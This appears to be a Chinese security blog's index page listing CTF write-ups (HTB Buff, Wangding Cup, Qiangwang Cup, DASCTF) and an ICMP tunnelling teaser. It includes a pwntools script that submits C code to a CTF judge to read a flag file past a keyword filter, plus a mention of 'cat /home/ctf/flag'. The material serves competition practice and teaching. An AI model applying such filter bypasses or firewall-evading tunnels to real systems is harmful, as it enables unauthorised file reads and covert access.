[HTB]Buff walkthrough

阅读更多
初探ICMP隧道


ICMP隧道也不是什么新奇的技术了,但是在某些渗透测试场景下可以说是一种挺骚的操作,其产生的畸形网络流量可以用于逃避防火墙的规则,这里仅拿两种应用方式演示,不具体讨论ICMP协议,还不知道ICMP是啥的可以先百度了解一下。

阅读更多
2020网鼎杯-WriteUp

青龙组的题。老烂尾文章了,复盘一下。

Web

filejava

一道XXE的题目。
先看到个上传功能,传完可以下载。
在下载功能点存在任意文件下载漏洞。

阅读更多
2020强网杯Online-WriteUp

近来档期满满,隔天就一场。猝si的感jio。
越来越菜,也就只能帮二进制爷爷打打杂交交flag这样啦。
just do it.

强网先锋

upload

简单题。给了流量包,结合题目名,八九不离十。直接滤http流,找到了图片上传。

阅读更多
BJD3rd&DASCTF-WriteUp

PWN

TaQini OJ 0

没附件,盲打,nc上去。

一个OJ系统,可以编译运行写的C代码,提示输出Hello TaQini,按要求写一段C后给了flag的路径/home/ctf/flag
然后很自然的尝试了system("cat /home/ctf/flag")发现过滤了flag和system,exec类的函数。然后一个劲的写漏洞程序想着getshell,现在想想真是SB。直接读文件就完事了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *

context(log_level="debug", arch="amd64")

io = remote("183.129.189.60", 10075)

program = """
#include <stdio.h>

int main(){
char buff[128]={0}, file[128]={0};
scanf("%s", file);
FILE* fp = fopen(file, "r");
fscanf(fp, "%s", buff);
printf("%s", buff);
return 0
}@

"""

io.sendlineafter("'@')", program)
io.sendlineafter("(Y/n)", "/home/ctf/flag")

io.interactive()
阅读更多